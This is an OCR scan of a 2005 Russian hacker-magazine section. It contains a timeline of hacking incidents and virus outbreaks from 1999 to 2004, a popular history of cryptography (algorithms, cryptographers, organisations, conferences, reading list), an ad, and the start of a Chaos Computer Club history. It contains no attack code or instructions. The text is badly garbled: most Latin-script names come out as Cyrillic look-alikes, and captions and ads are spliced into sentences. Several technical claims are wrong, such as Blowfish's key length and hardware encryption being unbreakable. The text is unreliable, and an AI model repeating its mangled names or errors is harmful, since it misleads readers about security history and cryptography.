вышении безопасности правительственных компьютерных систем 1.4 
миллиарда долларов. 

[1999] Неизвестные хакеры захватывают управление британским воен- 
ным спутником связи и требуют деньги за возвращение контроля над ним. 
[декабрь 1999] 29-летний программист из Нью Джерси Дэвид Смит 
признан виновным за создание и распространение вируса Меіізза, ко- 
торый в марте поразил более 100 тысяч компьютеров и причинил об- 
щего ущерба на 80 миллионов долларов. Смит стал первым человеком 
в истории, осужденным за написание компьютерных вирусов. Он полу- 
чил 20 месяцев тюрьмы. 

[февраль 2000] Канадский хакер МаІіаВоу осуществляет масштабную 
ООоЗ-атаку, которая приводит к прекращению работы нескольких наи- 
более популярных ресурсов сети. Среди жертв оказались крупнейший 
онлайн-магазин Атагоп, новостной портал СЫЫ и поисковой сервер 
Ѵаііоо! 16-летнего хакера приговорили к 8 месяцам отбывания в дет- 
ском исправительном центре. 

[2000] В знак протеста против агрессии в Кашимире и Палистине, па- 
кистанские активисты проводят дефейсы сайтов, принадлежащих пра- 
вительству Индии и Израиля. 

[2000] Хакеры проникают во внутреннюю сеть МісгозоК и получают до- 
ступ к исходникам последней версии ѴѴіпсІоѵѵз. После того, как код был 
опубликован в Сети, в американских газетах появились заголовки: 
«Русская мафия ворует код ѴѴіпМЕ». 

[июнь 2000] Стартует проект Нопеупеі известного зесигііу-эксперта 
Лэнса Спитзнера, целью которого является повышение безопасности 
интернета в целом. 

[май 2000] Вирус, под названием І_оѵеІ_еиег (за содержание в топике 
строчки: «I І_оѵе Ѵои»), за несколько часов распространяется по всему 
интернету, неся хаос и многомиллионные потери. 

[июль 2000] Институт ЗАЫЗ впервые выпускает список 10 главных 
уязвимостей, используемых хакерами для взлома систем. Список ока- 
зывается востребованным и начинает выходить регулярно. 

[2001] Корпорация МісгозоК становится жертвой нового вида БоЗ-атак, 
направленных на ОЫЗ. В течение двух дней главный сайт компании ста- 
новится недоступным для миллионов юзеров. 

[февраль 2001] В Сети появляется вирус Аппа Коигпікоѵа, якобы со- 
держащий в аттаче картинки известной спортсменки. 

[июль 2001] ФБР арестовывает русского программиста Дмитрия Скля- 
рова, приехавшего на конференцию Оеісоп прочитать лекцию о степени 
защищенности и возможности взлома ЕЬоок — электронного аналога пе- 
чатных книг. Арест вызвал бурю возмущения в мировом компьютерном со- 
обществе. Призывы поддержать Дмитрия и байкотировать продукцию 
АбоЬе, выступившей обвинителем, публиковались на многих сайтах. Скля- 
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ров стал первым человеком, чье дело рассматривалось в рамках закона 
БМСА (Оідііаі МіІІеппіит СоругідПІ Асі). 13 декабря 2001 г. суд снял с него 
все обвинения. 

[август 2001] Первый полиморфный вирус Собе Веб заражает десятки 
тысяч компьютеров в Сети. 

[2001] Появляется новый вид ОБоЗ-атак, в котором используются ком- 
пьютеры-зомби для генерации случайных пингов. 

[декабрь 2001] В результате тщательно спланированных ФБР антиха- 
керских рейдов, на скамью подсудимых попадают ключевые мемберы 
ведущих кракерских и варезных групп: Огіпк ог Біе, Вагог 91 1 , ЕѴіАІМСЕ, 
ВодиеѴѴагтіогг, ТРІ_, ѴѴІ_ѴѴ, ВіЗС. Но арест и тюремное заключение круп- 
ных фигур практически никак не отразились на активности кракеров. 
[апрель 2002] Военные структуры США запускают проект МаппІіеіт, 
целью которого является повысить безопасность военных компьютер- 
ных систем. 

[2002] ФБР арестовывает хакера, взломавшего 92 компьютерные 
сети Министерства Обороны США и несколько частных сетей. Гэри 
Маккинона ака 30І_0 обвинили по 8 статьям о компьютерных престу- 
плениях и нанесении ущерба в 900 тысяч долларов. Пресса назвала 
Маккинона хакером всех времен. 

[ 2002 ] Неизвестные хакеры организуют БоЗ-атаку, направленную на 13 
гооі-серверов, являющихся центральными узлами Интернета, координи- 
рующими трафик. Благодаря гибкой структуре сети пользователи во 
всем мире не ощутили снижения скорости соединения, но сам факт вы- 
звал дискуссии на зесигііу-форумах о теоретической возможности вы- 
звать сбой всей сети. 

[2003] Начало масштабной спамерской эпидемии от Центра Американ- 
ского английского в рунете. Предложение подучить английский получа- 
ет практический каждый русский пользователь сети. Впоследствии гла- 
ву Центра находят убитым в своей квартире. 

[2003] Вирусы ЗоВід, ЗІаттег и МЗВІазІ порождают невиданные ранее 
эпидемии. ЗІаттег стал рекордсменом по скорости распространения, зара- 
зив сотни тысяч машин всего за пару часов. Последствия коснулись не толь- 
ко частных фирм, но даже аэропортов, которым пришлось отложить рейсы. 
[2003] Неизвестные хакеры выкрали из компьютеров игрового разра- 
ботчика Ѵаіѵе, исходный код одной из самых ожидаемых 
игр НаІІ І_іІе 2, и опубликовали его в Сети. 

[2004] Американский 26-летний студент Джатан Дезир ста- 
новится первым человеком, которого привлекли к уголов- 
ной ответственности в рамках программы РазІІіпк. Програм- 
ма была введена правительством США для поиска и ареста 
пиратов, нелегально распространяющих ПО. 

[2004] Количество известных компьютерных вирусов пере- 
валило за 100 тысяч. 

[22 октября 2004] Вынесен приговор по делу известного 
русского вирусмейкера ѴѴИаІе. Автора вирусов Зіераг и Оа- 
зігороб, мембера известной 29А, приговорили к смешному 
штрафу в 3000 рублей. Столь мягкое наказание объясняет- 
ся отсутствием заявлений от пострадавших. 

[2004] Состоялся самый первый в Америке суд над спа- 
мерами. Джереми Джейнс и Джессика Дегрут, брат и се- 
стра, рассылали пользователям АОІ_ миллионы рекла- 
мных сообщений, предлагая купить программы для бы- 
строго заработка в Интернете. Джейнса посадили в тюрь- 
му, в то время как его сестра отделалась штрафом в нес- 
колько тысяч долларов. 
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[2004] Появление первого червя, 
распространяющегося через про- 
токол ВІиеІооФ и заражающего мо- 
бильные телефоны, работающие 
под управлением ЗутЬіап 03. Са- 
Ьіг, как назвал его автор, не нанес 
зловредных функций, но из-за его 
постоянных попыток сканировать 
активные блутус-устройства, неко- 
торые телефоны после заражения 
работали нестабильно. 

[2004] 21 -летний Брайан Сальцедо получает самый большой в истории 
компьютерных преступлений срок тюремного заключения. К 9 годам 
приговорил его суд за взлом сети компьютерного магазина и нарушение 
его работы. Хак производился из машины, во время очередного сеанса 
вардрайвинга (поиска незащищенных ѴѴі-Рі сетей). 

[2004] Ученые ведущих научных центров мира 
приступили к совместной разработке компью- 
терной сети, которую «невозможно взломать». 

Основана она будет на квантовой криптографии. 

[декабрь 2004] В Китае произошел запуск 
интернета нового поколения СЕВІМЕТ2 (СНіпа 
Ебисаііоп апб ВезеагсИ Ыеіѵѵогк 2), обладающе- 
го пропускной способностью 2.5-10 Гб в секун- 
ду и работающего по протоколу ІРѵб. Первыми 
узлами стали ведущие исследовательские ин- 
ституты страны © 




Владимир Левин 
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Информация 
под замком 

ТЫ НИКОГДА НЕ ЗАДУМЫВАЛСЯ, ЧТО ПРЕД- 
СТАВЛЯЕТ СОБОЙ НАИБОЛЬШУЮ ЦЕННОСТЬ 
В СОВРЕМЕННОМ МИРЕ? МОЖЕТ БЫТЬ, ДЕ- 
НЬГИ? ИЛИ ВЛАСТЬ НАД ДРУГИМИ ЛЮДЬМИ? 
НЕТ, ДРУГ, ЭТО ВСЕ НЕ ТО. В ДВАДЦАТЬ ПЕР- 
ВОМ ВЕКЕ НЕТ НИЧЕГО ВАЖНЕЕ ИНФОРМА- 
ЦИИ. НО, КАК И ЛЮБАЯ ДРУГАЯ ЦЕННОСТЬ, 
ИНФОРМАЦИЯ НУЖДАЕТСЯ В ЗАЩИТЕ. ДЛЯ 
ЭТОГО БЫЛА СОЗДАНА ЦЕЛАЯ НАУКА — 

КРИПТОГРАФИЯ I Илья Александров (Пуа_а1@гатЫег.ш) 



Криптография вчера 
и сегодня 

[вводная] Прежде чем я начну тебе рассказы- 
вать об истории криптоалгоритмов, о влиятель- 
ных компаниях и крутых программерах, дам те- 
бе несколько определений, без которых даль- 
нейшее повествование будет бессмысленно. 
Итак, криптография — это наука об исполь- 
зовании математики для шифрования дан- 
ных. Процесс получения зашифрованной ин- 
формации, то есть взлом защиты, называют 
криптоанализом. Хотя криптоанализ и крип- 
тография преследуют противоположные це- 
ли, они неразделимы, и вместе составляют 
единую дисциплину — криптологию. Нет хо- 
рошего криптографа, который плохо бы вла- 
дел криптоанализом. 

Криптография бывает слабой и стойкой. Пер- 
вая нужна для шифрования порнофильмов от 
бдительных маминых глаз, вторая — чтобы 
сохранить в секрете государственную тайну. И 
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отнюдь не факт, что слабая криптография не имеет права на жизнь — 
зачем тратить лишнее время и ресурсы на изобретение более стойкого 
криптоалгоритма, если и текущего вполне хватает? Идем дальше. 
Криптографический алгоритм — это математическая формула, произ- 
водящая процесс шифрования. Алгоритм взаимодействует с ключом — 
словом или числом, в зависимости от которого происходит шифрование 
данных. Алгоритм, ключ, и протоколы (программы) вместе составляют 
криптосистему, например, РОР. Криптография делится на две разно- 
видности: симметричная и асимметричная. При использовании послед- 
ней, данные зашифровываются общедоступным открытым ключом, но 
получить к ним доступ можно лишь в том случае, если известен второй, 
секретный ключ. Симметричная криптография использует один-един- 
ственный ключ, но это вызывает проблему создания надежного секрет- 
ного канала для обмена ключами. 

Стойкость алгоритма во многом зависит от длины ключа, которая измеряет- 
ся в битах. Число, используемое как 1024-битный ключ до ужаса огромно. 
Все, студент, краткий ликбез в мир криптографии завершен. Только не 
думай, что после прочтения этого абзаца, ты стал крутым шифроваль- 
щиком — чтобы всерьез заняться криптографией, нужно иметь высшее 
физико-математическое образование, навыки программиста и талант. 

[история] История криптографии началась задолго до изобретения 
ЭВМ. Еще Юлий Цезарь, не доверяя своим гонцам, шифровал сооб- 
щения, изменяя каждую букву на идущую через следующую по алфа- 
виту. То есть менял А на С, В на О и так далее. Правда, это можно бы- 
ло скорее назвать тайнописью, чем криптографией. Именно тайно- 
пись использовалась людьми для передачи секретной информации 
вплоть до середины двадцатого века. Это донаучный период, на ос- 
нове практических экспериментов, скудной теории и интуитивных до- 
гадок о стойкости алгоритмов. Полноценным разделом прикладной 
математики криптография стала лишь в 1948 году, когда американ- 
ский ученый Клод Шеннон создал теорию информации и кодирова- 





ния. Шеннон доказал всему миру 
возможность измерения количе- 
ства и передачи информации (да, 
всего лишь полвека назад фраза 
«количество информации» требо- 
вала доказательства). Долгое 
время криптография оставалась 
секретной деятельностью спец- 
служб и государственных струк- 
тур. Она также способствовала 
развитию электронно-вычисли- 
тельной техники — первые такие 
машины были созданы специаль- 
но для взлома шифров военных 
лет. Простые смертные получили 
возможность использовать криптоалгоритмы на своих компьютерах 
лишь в 1976 году, когда ІВМ разработала новый стандарт ЭЕЗ (Эаіа 
Епсгурііоп Зіапсіаф и сделала его общедоступным. Это вызвало инте- 
рес к криптографии у математиков и программистов, в результате че- 
го появились соответствующие фирмы и подразделения на кафедрах 
университетов. В частности, Диффи и Хеллман изобрели ассиметрич- 
ную криптографию, о которой я уже говорил выше. Первым «ассиме- 
тричным» стандартом стал ВЗА, разработанный не криптокомпанией 
и не по заказу спецслужб, а тремя учеными-математиками в исследо- 
вательских целях — Рональдом Ривестом, Эди Шамиром и Леонар- 
дом Адлеманом. Первые буквы фамилий ученых дали название алго- 
ритму. Не смотря на то, что ВЗА разработан около 30 лет назад, он и 
сегодня широко используется во многих областях — интернете, кре- 
дитных картах, локальных сетях. До сих пор не найдено эффективных 
способов взлома этого криптоалгоритма. 

В 1989 году криптография дошла и до СССР. Отечественным стадар- 
том шифрования стал ГОСТ 28147-89, являвшийся симметричным 
шифром. Подобный ЭЕЗ, ГОСТ является главным российским алго- 
ритмом и по сей день. 



[алгоритмы] Как ты уже понял, 
криптография — это, прежде все- 
го, алгоритмы. Их изобретают 
ученые, их ломают хакеры, в их 
совершенствование вкладывают 
миллионы долларов. Пора рас- 
сказать о самых известных крип- 
тоалгоритмах. 

ЮЕА — (Іпіегпаііопаі Эаіа Епсгур- 
Ііоп АІдогШіт), написанный швей- 
царцами Лэем и Мэсси, позицио- 
нирующийся как международный 
стандарт шифрования. Благодаря 
стараниям международных орга- 
низаций стандартов, фактически 
является основным криптоалго- 
ритмом в Европе. ЮЕА написан на 
СИ и любой желающий может ска- 
чать себе исходники. 

І_ОКІ — разрабатывается в академии 
министерства обороны Австралии с 
1989 года. Один из его авторов — 
Лори Браун, писал докторскую дис- 
сертацию о криптографии, ну и по хо- 
ду дела создал свой шифр. І_ОКІ до- 
вольно стоек, но в процессе его изу- 
чения, криптоаналитики обнаружили 
пару ошибок, что вывело его из груп- 
пы лидеров среди алгоритмов. 
ВіоѵѵіізГі — один из самых известных и популярных шифров. Он имеет 
ключ переменной длины, от 48 до 64 бит, что повышает его защищен- 
ность. ВІоѵѵТізИ создан Брюсом Шнайером в 1993 году, как свободно ли- 
цензируемый и используемый для любых целей. В 1994 году шифр вы- 
играл престижный приз журнала ЭВЮОВВ как самый безопасный алго- 
ритм. В настоящий момент существует улучшенная версия ТѴѴОРІ8Н, 
написанная тем же автором. 

ВС6 — проект известного еще по В5А Рональда Ривеста. Один из са- 
мых быстро работающих алгоритмов, постоянно совершенствующийся 
и дорабатывающийся. 

Крупнейшее событие в истории криптографии последних лет — вы- 
бор нового алгоритма шифрования АЕЗ. Дело в том, что в середине 
90-х стало абсолютно ясно, что ЭЕЗ безнадежно устарел и требует 
замены. В 1997 году Национальный институт стандартов и техноло- 
гий США объявил открытый конкурс на федеральный стандарт ши- 
фрования. Требования к алгоритму были такие: открытая публика- 
ция, допустимость аппаратной и программной реализации, бесплат- 
ность. Первый тур конкурса прошел в калифорнийском городке Вен- 
туре, где были названы 15 заявленных алгоритмов из 12 стран ми- 
ра. Были представлены лучшие криптосистемы, среди которых не- 
мало национальных стандартов. 

Победителем, а фактически лучшим криптоалгоритмом в мире, стал 
бельгийский ВШЭАЕІ_. Разработали шифр Йон Дамен и Винсент Рэмен 
из Лувенского католического университета, являющегося ведущим цен- 
тром изучения криптографии в Европе. Шифр очень быстрый, не требо- 
вателен к ресурсам, может иметь разную длину ключа. На сегодняшний 
день случаев взлома ВШОАЕІ_ не зафиксировано. 

Допускаю, что ты ничего не слышал о ВШЭАЕІ_ и ЮЕА для тебя пустой 
звук. Но вот в том, что ты отлично представляешь, что такое РОР, я 
уверен. Ргеиу ОоосІ Ргіѵасу, что можно перевести «довольно неплохая 
защита», является популярнейшей криптосистемой и стандартом ши- 
фрования электронной почты. История РОР началась в 1991 году, ког- 
да американский программист Фил Зиммерман написал первую вер- 
сию пакета. В то время в США существовал запрет на экспорт техноло- 
гий шифрования, и Фил не мог распространять свою программу. Это 

настолько возмутило передовую 
американскую молодежь, что не- 
которые студенты носили футбол- 
ки с изображенным на них кодом 
алгоритма. Впрочем, каждый мог 
зайти на портал ѵѵѵѵѵѵ.рдрі.сопп и 
скачать себе криптосистему, нев- 
зирая на законы. В 1996 году Зим- 
мерман основал компанию РОР, 
Іпс, ставшую в последствии ча- 
стью холдинга Ыеіѵѵогк Аззосіаіез, 
где продолжает работу над своим 
продуктом. 



ССЫЛКИ ПО ТЕМЕ 

ѵѵт /ѵ.іасг.огд — международная ассоциация криптологических исследований 

ѵѵѵѵѵѵ.ззі.зіи.пеѵа.ги — центр защиты информации Питерского Политеха 

ѵѵѵѵѵѵ.сгуріодгарііу.ги — все о криптографии на русском 

тм.Іззг.ги — Институт криптографии, связи и информатики 

ѵѵѵѵѵѵ.соМісІепі.ги — журнал «Конфиндент», повествующий о защите информации 

ѵѵѵѵѵѵ.гзазесигііу.сот — портал компании ВЗА Зесигііу 

ѵѵт /ѵ.пза.доѵ — Американское агентство национальной безопасности 

ѵѵѵѵѵѵ.сІеап.изта.есІи/таіІі/риЬз/сгуріоІодіа — популярный журнал для криптологов 
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Взломы серьезных криптоалгоритмов происхо- 
дят очень редко — для этого нужны специали- 
сты высокого уровня и большие аппаратные 
ресурсы. Поэтому каждый удачный опыт крип- 
тоанализа становится своего рода сенсацией и 
ведет к довольно серьезным последствиям. К 
примеру, группа китайских криптоаналитиков 
недавно взломала американский алгоритм 
5НА-1, применяющийся в электронно-цифро- 
вой подписи. Из-за этого пришлось разрабаты- 
вать и использовать более надежные криптоси- 
стемы, что оказалось чревато большими фи- 
нансовыми потерями. 

Осталось поведать тебе об аппаратном шифро- 
вании. При использовании этой разновидности 
криптографии требуется не только криптосисте- 
ма, но и особое устройство — шифратор. Аппа- 
ратное шифрование медленней и гораздо доро- 
же обычного, но вероятность взлома подобных 
систем исключена. У нас в России шифраторы 
изготавливает фирма «Анкад». Устройства серии 
«Криптон» базируются на алгоритме ГОСТ и хра- 
нят ключи на смарт-картах с открытой памятью. 




Клод Шеннон. Чело- 
век, без которого бы 
не было криптографии 



[личности] Как и у любого другого движения, 
у криптографии есть ярко выраженные лидеры, 
на которых все это движение и держится. 

Один из самых авторитетных криптографов — 
Рональд Ривест. Рональд является профессо- 
ром информатики и математики в Массачусет- 
ском Технологическом университете и членом 
лаборатории искусственного интеллекта МТИ. 
Он основатель ведущей компании в области 
информационной безопасности ВЗА ОаХа Зе- 
сигііу и обладатель многих наград, в том числе 
таких почетных, как премия Тьюринга. Являет- 
ся одним из создателей алгоритма ВЗА и авто- 
ром многих статей о 
защите информации. 

Пол Кочер — амери- 
канский криптограф, в 
настоящее время зани- 
мающий пост прези- 
дента компании Сгуріо- 
дгарПу ВезеагсИ, Іпс. 

Пол нашел уязвимости 
в таких известных ал- 
горитмах, как ВЗА, 

ЭЗА и многих других. 

Он же является одним 
из создателей протоко- 
ла для безопасной пе- 
редачи данных в Ин- 
тернете — 53І_. В 1991 
году получил степень 
бакалавра в Стэнфор- 
довском университете. 

Дэн Бернштейн — 



Брюс Шнайер, создатель ЫоѵѵЛзИ 




Рональд Ривест, отец криптоалгоритма ВЗА 




МСсифер^члл І\с Крипто ’ЯЮ ^ 




профессор математики университета Иллинойс, автор почтового демо- 
на ОтаіІ. Основатель сайта сг.ур.іо, одного из лучших порталов о ши- 
фровании. В свое время судился с американским правительством из-за 
публикации исходников криптоалгоритмов. 

Ян Голдберг — основатель криптографической группы в университете 
Беркли. Взламывал криптографические ключи ВЗА, ЗЗЦ криптосисте- 
му сотовой связи ОЗМ. Глава компании 2его Кпоѵѵіебде Зузіетз, спе- 
циализирующейся на разработке зесигіІу-ПО. 

Брюс Шнайер — разработчик криптоалгоритмов ЫиеІізИ и ІѵѵоІізІі. Ра- 
ботает на компанию Іпіегпеі Зесигііу, Іпс. Автор лучшей книги по ши- 
фрованию «Прикладная криптография». Выпускает е- 2 Іпе Сгуріо- 
Огат ІМеѵѵзІеКег, посвященный ИТ-безопасности. 

Фил Зиммерман. Чтобы стать великим, нужно сделать всего одну вещь. 

Фил сделал РОР, этого оказалось 
достаточно, чтобы войти в исто- 
рию как лучший криптограф. 

Это лишь несколько имен. Мир 
криптографии достаточно велик 
и в нем есть сотни других, не ме- 
нее выдающихся личностей. 

[компании] Самая крутая крип- 
то-организация — Іпіегпаііопаі Аз- 
зосіаііоп Іог Сгуріоіодіс ВезеагсП 
(ІАСВ). Эта компания занимается 
криптографическими исследова- 
ниями, разрабатывает новые алго- 
ритмы и ищет уязвимости в ста- 
рых. ІАСВ награждает своей пре- 
мией особо отличившихся крипто- 
графов, проводит симпозиумы по 
ИТ-безопасности в разных странах 
мира. Организация выпускает 
свой журнал ііоигпаі оі Сгуріоіоду 
(і /ѵшш.іасг.огд/іоіс/іоіс.ЫтІ ) , пожа- 
луй, лучший в своем роде. Всту- 
пить в ІАСВ может любой желаю- 
щий, если соответствует требованиям. Об этих требованиях и другую 
информацию можно найти на официальном сайте ил/іа ѵ.іасг.огд. 

Не менее авторитетной организацией является ЫЗА — агентство на- 
циональной безопасности США. В задачи І\ІЗА входит сохранять бе- 
зопасность страны в области телекоммуникаций, в том числе интер- 
нета. На родине агентство известно как «электронная разведка». 
ЫЗА ведет разработку собственных криптоалгоритмов, проводит 
анализ существующих систем безопасности. Агентство националь- 
ной безопасности является крупнейшим работодателем в мире для 
математиков, в ее распоряжении огромное количество мощнейших 
компьютеров. Организация фактически полностью засекреченная, 
не известно ни каков ее бюджет, ни количество ее сотрудников. 
Агентство откровенно недолюбливают в среде криптографов, так как 
свои наработки оно держит в секрете, да и вообще развитие крипто- 
графии отнюдь не в интересах ЫЗА. Организация выпускает доволь- 
но скандально известную «Оранжевую книгу» — периодическое из- 
дание, в котором даются критерии оценки компьютерных систем бе- 
зопасности. Именно по этой книге в США характеризуют безопас- 
ность сетей, в том числе и военных. 

Крупнейшей же криптографической компанией в России является 
РКА (Российская Криптологическая ассоциация). Это околонауч- 
ная организация с довольно сложной иерархией. РКА представля- 
ет интересы криптологов в нашей стране, проводит собственные 
разработки, спононсирует различные проекты в области ИТ. Орга- 
низация проводит ежегодную конференцию «РусКрипто», крупней- 
шее в СНГ мероприятие такого рода. 




официальный сайт конференции «РусКрипто» 



[тусовки] Как и любые другие нормальные ребята, криптологи любят 
встретиться в уютном месте, попить пиво, обсудить проблемы и перспекти- 
вы развития своей области. 

Самая крупная конференция — это ЕигоСгурІ, которая ежегодно 
кочует по разным городам старого света. На нее съезжаются са- 
мые известные специалисты, там представляют новые разработки. 
Кстати, в 2006-ом году ЕвроКрипт будет проходить в Питере — не 
рекомендую пропускать. 

Также популярна СВѴРТО, проводящаяся в Санта-Барбаре. Но на ней в 
основном обсуждаются чисто американские проблемы, что, впрочем, 
немаловажно, ведь США — лидер мировой криптоиндустрии. 

В Амстердаме свою выставку проводит компания ВЗА Зесигііу Еигоре. Она 
посвящена не только криптографии, но и зесигііу в целом, что привлекает 








ѵт\л^$1гееігасіпдтад.ги 



[ХАКЕР 09 [81] 05 > СЦЕНА 092 ] 






о криптографии в свободной энциклопедии 



вот так проходит изучение квантовой криптографии 



эмблема Агентства национальной 
безопасности 



[разное] Шифропан- 
ками называют крипто- 
логов-фанатов. Это те, кто заинте- 
ресован в изучении криптографии и 
постоянно ищет пути совершенство- 
вания этой науки. Шифропанки пи- 
шут ПО для защиты информации, 
разрабатывают собственные алго- 
ритмы. Многие известные ученые 
также причисляют себя к этому дви- 
жению. Тусовка шифропанков про- 
ходит вокруг дискуссионного листа 
— тфгботоШоасІ.сот. 

Также их можно найти в ІІзеЫеІ — 
иерархия зсі.сгурі. Конференцию 
читают порядка 100 тысяч человек 
по всему миру, и некоторые ново- 
сти их мира криптографии можно 
узнать только там. 

Теперь немного об образовании. 

Сегодня профессия «крипто- 
граф» — уже не миф, соответ- 
ствующие кафедры есть во мно- 
гих ВУЗах нашей страны. При академии ФСБ России существует да- 
же Институт криптографии, связи и информатики. Стоит ли идти 
учиться на специалиста по защите информации решать тебе, хотя в 
нашей стране это пока не так востребовано, как за рубежом. 

Вот, собственно, и все, что я хотел тебе рассказать о криптографии. Ты уз- 
нал об алгоритмах, криптосистемах, о специалистах этой области, может, 
даже захотел сам заняться криптологией. Информация с каждым годом ста- 
новится все более ценным товаром и всегда найдется тот, кто за ее сохран- 
ность готов заплатить любые деньги. К тому же это достаточно молодая 
область науки, предоставляющая широкие горизонты для исследований 0 



ГС5А 



Ъ Е С и И Е (У 



логотип компании ВЗА Зесигііу 



ЫАЗА да МісгозоЙ, но 
это пока дело времени. 



[квантовая криптография] Мир не стоит на месте, на смену совре- 
менным шифрам приходит более совершенная квантовая криптогра- 
фия. В отличие от криптографии традиционной, которая для защиты 
данных использует математические законы, квантовая основана на 
физике информации. Процесс отправки и приема данных происходит с 
помощью физических средств таких, как электроны в токе, или фотоны 
в оптической связи. Как известно, в асимметричной криптографии 
ключ шифрования должен знать каждый из тех, кто будет обменивать- 
ся информацией. Поэтому этот ключ как-то надо сообщить другому, что 
создает опасность его перехвата. В квантовой криптографии подобная 
проблема исключена, кроме того, ее криптоалгоритмы нельзя взломать 
перебором (брутфорсом). Первую кванто-криптографическую систему 

создали в 1989 го- 
ду сотрудники ІВМ, 
также разработки 
в этой области ве- 
дут компании ОАР- 
Орііцие, МіІзиЬізГіі 
и ТозИіЬа. 

Фирма МадісО не- 
давно представила 
миру устройство Ыа- 
ѵф — первую систе- 
му квантовой крипто- 
графии. С помощью 
Ыаѵф можно соз- 
дать частную вирту- 
альную сеть, рабо- 
тающую на расстоя- 
нии 120 километров. 
Правда, стоимость 
этого устройства по 
карману только ФБР, 



АРФЫЕБ 
стгртосйдрніѵ 

ІЩ 



библия криптографов 



на нее самых разных посетителей, 
начиная сотрудниками научных ла- 
бораторий, заканчивая хакерами из 
андеграунда. 

Самой известной в России крип- 
тотусовкой, как я уже говорил, 
является «РусКрипто». 

Каждый год в начале февраля не- 
далеко от Москвы она собирает 
интересующихся криптологией 
людей. Здесь можно встретить как 
обычных пользователей, так и ав- 
торитетов, таких как Сергей Бари- 
чев или Дмитрий Скляров. Боль- 
шинство докладов конференции 
— это подведение итогов года, 
рассказ о самых крупных событиях 



в мире криптографии. Можно посмотреть достижения российского аппа- 
ратного шифрования, послушать о новых криптоалгоритмах, пообщать- 
ся с профессионалами мирового уровня. На «РусКрипто» представлены 
все крупные российские компании, занимающиеся ИТ-безопасностью. 



Фил Зиммерман — создатель РОР 



КНИГИ 

Криптография — наука мудреная. Ее методом научного 
тыка не освоишь, нужно читать умные книжки. Приведен- 
ных здесь книг хватит тебе, чтобы постигнуть примудрости 
криптографии. 

Щ Брюс Шнайер, «Прикладная криптография». Библия 
криптографов. 

\к\ Сергей Баричев, «Криптография без секретов». Хоро- 
ший учебник от русского автора. 

[з] О. Н. Василенко, «Теоретико-числовые алгоритмы в 
криптографии». Прочитай эту книжку, когда более-менее 
освоишься в мире шифрования. 

Щ О. В. Казарин, «Безопасность программного обеспече- 
ния компьютерных систем». Рассмотрены все аспекты со- 
временной криптологии. 

Щ А. Ю. Зубов, «Совершенные шифры». Узнай, что такое 
алгоритм, который нельзя взломать. 

[б] Нил Стивенсен, «Криптонамикон». Это не учебник, это 
просто классный роман в жанре киберпанк. Но читать все 
равно рекомендую! 













ЬѴ ' 




Пусть себе пишут 



Спам был, есть и будет. 

Но вы его даже не заметите. 




Япйех 

Найдётся всё 



ЮНИТЫ КРЕАТИФФ КОДИНГ ШЧІХОЮ СЦЕНА ВЗЛОМ ИМПЛАНТ РС_20ЫЕ РЕПРШМ НЬЮСЫ 
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Детище 
дядюшки Ву 



[Ву Холланд] В 1 981 г. хакерство только начи- 
нало зарождаться в Германии. На прилавках по- 
явились первые персональные компьютеры, и 
немецкие подростки с головой окунулись в мир 
программирования и компьютерных сетей. Ву 
Холланда (настоящее имя — Хьюарт Холланд- 
Мориц) вряд ли можно было отнести к подро- 
сткам. 32-летний шумный дяденька, любящий 
шутить и рассказывать истории, — он не был ха- 
кером в том смысле, которым считал себя Мит- 
ник. Но был не понаслышке знаком с хакерской 
этикой и являлся ее рьяным приверженцем. 

12 сентября 1981 г. Ву вместе со 22-летним сту- 
дентом Стефеном Вернери основал компьютер- 
ный клуб «Хаос». Он должен был стать своеоб- 
разным ответом бюрократии и посягательству на 



ШПИОНСКАЯ ИСТОРИЯ, В КО- 
ТОРУЮ БЫЛИ ВОВЛЕЧЕНЫ ХА- 
КЕРЫ ИЗ КЛУБА «ХАОС», В НА- 
ЧАЛЕ 90-Х ОБОШЛА ВЕСЬ МИР. ЕЕ 
ГЕРОИ НЕВОЛЬНО ПРИВЛЕКЛИ ВСЕ- 
ОБЩЕЕ ВНИМАНИЕ К СТАРЕЙШЕМУ 
ХАКЕРСКОМУ КЛУБУ ЕВРОПЫ, И МНО- 
ГИМ ТОГДА ХОТЕЛОСЬ ЗНАТЬ, НА ЧТО 
ЕЩЕ СПОСОБНЫ «ВЗЛОМЩИКИ ХАОСА». 
ПРОШЛО УЖЕ 15 ЛЕТ, НО НАД КЛУБОМ ПО- 
ПРЕЖНЕМУ ВИСИТ ОРЕОЛ ТАИНСТВЕННО- 
СТИ И МОГУЩЕСТВА... I тіпсІѵѵОгк (тіпсІѵѵОгк@датеІапсІ.ги) 



История СИаоз 
СотрЩег СІиЬ 




частную жизнь. Даже название клуба было выбрано таким, чтобы это звуча- 
ло вызывающе. Первое время мемберами клуба были знакомые и друзья 
Ву, новые люди стали приходить после того, как Хаос стал известным. 

В 1983 г. Ву Холланд написал серию статей в берлинскую газету «Та- 
гесцайтунг», выступая против переписи населения (Ву считал это по- 
сягательством на приватность граждан) и компьютерных баз данных о 
жителях Германии. Многие считали, что такое поведение не соответ- 
ствовало хакерскому кодексу. Мол, информация должна быть доступ- 
ной. Но Ву придерживался мнения, что доступной она должна быть 
только для частных лиц, в то время как правительство и крупные орга- 
низации не должны вмешиваться в личную жизнь. И те конторы, кото- 
рые, по мнению Холланда, нарушали это правило, он наказывал взло- 
мом их компьютерных систем. Хакерство стало для него оружием для 
борьбы с «темными силами». Конечно, Ву не считал, что занимается 
чем-то противозаконным. «Я проникаю в их системы, чтобы показать, 
насколько они уязвимы», — говорил основатель клуба «Хаос». Мало 
того, занимаясь постоянным взломом, мемберы клуба призывали 
остальных к соблюдению законов. 

В 1984 г. о клубе впервые заговорили. Произошло это после того, как 
Ву Холланд и Стефен Вернери взломали электронную информацион- 
ную систему ВТХ. ВТХ был грандиозным коммерческим проектом, в 
который немецкое правительство вбухало 450 миллионов долларов. 
В начале 80-х перспектива того, что в каждом доме будет стоять тер- 
минал, подключенный к огромной базе данных, и через который мож- 
но получить любую информацию (от расписания поездов до погоды на 
завтра), была фантастической. Пресса предрекала, что к 1985 г. в 
ФРГ будет более миллиона абонентов, но мечты остались мечтами — 
услуги оказались слишком дорогими для простого жителя Германии, 
к тому же для многих подобная система являлась чем-то далеким и 
непонятным. Ву и Стефен были уверены, что ВТХ далеко не так хоро- 
шо защищена, как заявили авторы. Воспользовавшись раздобытым 
паролем от аккаунта крупного гамбургского банка, хакеры запро- 
граммировали постоянный запрос информации. И, так как каждый 




Ву Холланд в кругу мемберов «Хаос» 



звонок в ВТХ обходился банку в 
6$, к утру счет составлял уже бо- 
лее 80 тысяч долларов. Об этом 
эксперименте Ву объявил пу- 
блично, а поскольку у парней бы- 
ли доказательства непричастно- 
